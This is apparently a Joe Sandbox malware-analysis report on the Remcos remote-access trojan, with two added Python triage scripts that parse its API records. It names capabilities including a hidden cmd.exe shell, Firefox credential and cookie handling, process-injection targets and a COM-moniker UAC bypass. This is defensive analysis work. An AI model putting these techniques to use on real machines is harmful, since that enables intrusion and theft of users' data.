                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
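The function records above list each function's Win32 calls as `Name.Module(stack slots), ref: call-site`, with calls made by callees prefixed `Part of subcall function <addr>:` (the `WSAStartup.WS2_32(00000202,00000000), ref: 004048B3` line appears both under the socket-creating function and as its own record further down). The following Python is an added triage helper, not part of this report or of Joe Sandbox: it parses lines in that notation and decodes the constants an analyst cares about in the records above, the `80000001` hive handle passed to `RegOpenKeyExA` and `RegCreateKeyA`, the `00000004` type slot of `RegSetValueExA`, the `00000002,00000001,00000006` triple passed to `socket`, the `00000202` Winsock version, and the `00003000`/`00000040` pair in the `VirtualAlloc` record, and it flags the `GetForegroundWindow`/`GetWindowTextW` pair. The constant tables are standard Win32 SDK values; the rule wording, the `Call` type and the sample (constructed from call lines copied out of the records above) are mine.

```python
"""Triage helper for the function-level 'APIs' listings of a Joe Sandbox report.
Added example, not part of the report or of Joe Sandbox; the rules and the
constant tables are the author's.  SAMPLE is constructed from call lines
copied out of the records above."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample in the report's own notation (one call per bullet).
SAMPLE = """\
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
• RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
• RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
• socket.WS2_32(00000002,00000001,00000006), ref: 00404852
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
• GetForegroundWindow.USER32 ref: 0041BAB8
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
• VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
"""

# One call line: optional 'Part of subcall' prefix, Name.Module, optional (slots), ref: addr.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>\w+)\s*(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

Slot = Union[int, str, None]   # hex stack slot, symbolic slot such as 'open', or '?' (unknown)


@dataclass
class Call:
    api: str
    module: str
    args: List[Slot]           # stack slots as captured by the sandbox, in order
    ref: int                   # address of the call instruction
    subcall: Optional[int]     # callee address when listed as 'Part of subcall function'


def _slot(tok: str) -> Slot:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok                 # e.g. the 'open' verb passed to ShellExecuteW


def parse_api_lines(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_slot(t) for t in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                          int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


# Standard Win32 constants used to decode the captured slots.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT_RESERVE = 0x3000    # MEM_COMMIT | MEM_RESERVE
REG_OPENERS = ("RegOpenKeyExA", "RegOpenKeyExW", "RegCreateKeyA", "RegCreateKeyW",
               "RegCreateKeyExA", "RegCreateKeyExW")


def triage(calls: List[Call]) -> List[str]:
    """Return human-readable findings.  Caveat: the slots are a stack snapshot, not a
    verified argument list (the VirtualAlloc record shows four 0x40 slots before anything
    that looks like a size), so the RWX rule asks whether both telltale constants are
    present instead of trusting positions; the registry rules do trust positions, which
    happens to hold for the records this sample was copied from."""
    findings = []
    for c in calls:
        if c.api in REG_OPENERS and c.args and c.args[0] in HIVES:
            findings.append(f"{c.api} on {HIVES[c.args[0]]} @ {c.ref:08X}")
        elif c.api.startswith("RegSetValueEx") and len(c.args) > 3 and c.args[3] in REG_TYPES:
            findings.append(f"{c.api} writes a {REG_TYPES[c.args[3]]} value @ {c.ref:08X}")
        elif c.api == "VirtualAlloc" and PAGE_EXECUTE_READWRITE in c.args and MEM_COMMIT_RESERVE in c.args:
            findings.append(f"VirtualAlloc MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE @ {c.ref:08X}")
        elif c.api == "socket" and c.args[:3] == [2, 1, 6]:
            findings.append(f"socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) @ {c.ref:08X}")
        elif c.api == "WSAStartup" and c.args and c.args[0] == 0x202:
            findings.append(f"WSAStartup requests Winsock 2.2 @ {c.ref:08X}")
    names = {c.api for c in calls}
    if {"GetForegroundWindow", "GetWindowTextW"} <= names:
        findings.append("GetForegroundWindow + GetWindowTextW: active-window title capture")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_api_lines(SAMPLE)):
        print(finding)
```

Run it on the `APIs` bullets of any record (paste them into `SAMPLE` or feed `parse_api_lines` the copied text). `?` marks a slot the sandbox could not resolve and is kept as `None` so a rule never mistakes it for a zero; a slot that is not eight hex digits is kept as text, which is how the `open` verb of the `ShellExecuteW` record further down would come through.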
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                            • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                            • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                            • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                          • DeleteFileA.KERNEL32(?), ref: 00408652
                                                            • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                            • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                            • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                            • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                          • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                            • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                          • API String ID: 1067849700-181434739
                                                          • Opcode ID: 9c6684c4782dd6b38750199dcd552d21679c50fd0583f0d2d695d87543971fcb
                                                          • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                          • Opcode Fuzzy Hash: 9c6684c4782dd6b38750199dcd552d21679c50fd0583f0d2d695d87543971fcb
                                                          • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                          • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                          • API String ID: 2994406822-18413064
                                                          • Opcode ID: d822b09cf1c83d37968f1791560ca3d4abf36940af86ae54e3bb9bd7b62a3c98
                                                          • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                          • Opcode Fuzzy Hash: d822b09cf1c83d37968f1791560ca3d4abf36940af86ae54e3bb9bd7b62a3c98
                                                          • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                            • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                            • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                          • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                          • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                          • API String ID: 3018269243-13974260
                                                          • Opcode ID: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
                                                          • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                          • Opcode Fuzzy Hash: 94cd0e690e29393e168c36f2201fa927646a70d566ab7c517b625d411d554f8e
                                                          • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                          • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                          • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                          • Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
                                                          • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 004168C2
                                                          • EmptyClipboard.USER32 ref: 004168D0
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                          • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                          • CloseClipboard.USER32 ref: 00416955
                                                          • OpenClipboard.USER32 ref: 0041695C
                                                          • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                          • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                          • CloseClipboard.USER32 ref: 00416984
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID: !D@
                                                          • API String ID: 3520204547-604454484
                                                          • Opcode ID: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
                                                          • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                          • Opcode Fuzzy Hash: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
                                                          • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                          • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                          • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$File$FirstNext
                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 3527384056-432212279
                                                          • Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                          • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                          • Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
                                                          • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                          APIs
                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                          • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                          • CloseHandle.KERNEL32(?), ref: 00413465
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                          • String ID:
                                                          • API String ID: 297527592-0
                                                          • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                          • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                          • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                          • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                          • API String ID: 3756808967-1743721670
                                                          • Opcode ID: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                          • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                          • Opcode Fuzzy Hash: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                          • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                                          • API String ID: 0-1861860590
                                                          • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                          • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                          • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                          • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00407521
                                                          • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                          • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                          • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                          • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
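The function records above (file-manager commands, the cmd.exe shell driven over CreatePipe/CreateProcessA, the mutex-guarded watchdog thread, the Firefox logins.json/key3.db and cookies.sqlite clearing, clipboard read/write, Toolhelp32 enumeration of ieinstal.exe/ielowutil.exe as injection targets, and the CoGetObject call with the Elevation:Administrator!new: moniker and the CMSTPLUA CLSID) are raw IDA-plugin output. The script below is an added example by the editor, not part of the Joe Sandbox report or of Remcos: it parses such records into API sets and String IDs and flags capabilities. The embedded excerpt is trimmed from three of this report's own records; the capability labels and the matching rules are the editor's assumptions, keyed on the API names and strings those records show.

```python
"""Triage Joe Sandbox 'IDA Plugin' function records.

Added example (editor's code, not the report's or Remcos'): parse each
record's API calls and String ID into a structure and flag capabilities
with rules keyed on the APIs and strings the records show.
"""
import re
from dataclasses import dataclass, field

# Excerpt trimmed from this report's own records (UAC bypass via COM
# elevation moniker, cmd.exe shell over pipes, Firefox login clearing).
SAMPLE_REPORT = """\
APIs
• _wcslen.LIBCMT ref: 00407521
• CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
• Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
APIs
• CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
• CloseHandle.KERNEL32 ref: 00405A23
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• String ID: 0lG$0lG$SystemDrive$cmd.exe$kG
• Opcode ID: d822b09cf1c83d37968f1791560ca3d4abf36940af86ae54e3bb9bd7b62a3c98
• Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
APIs
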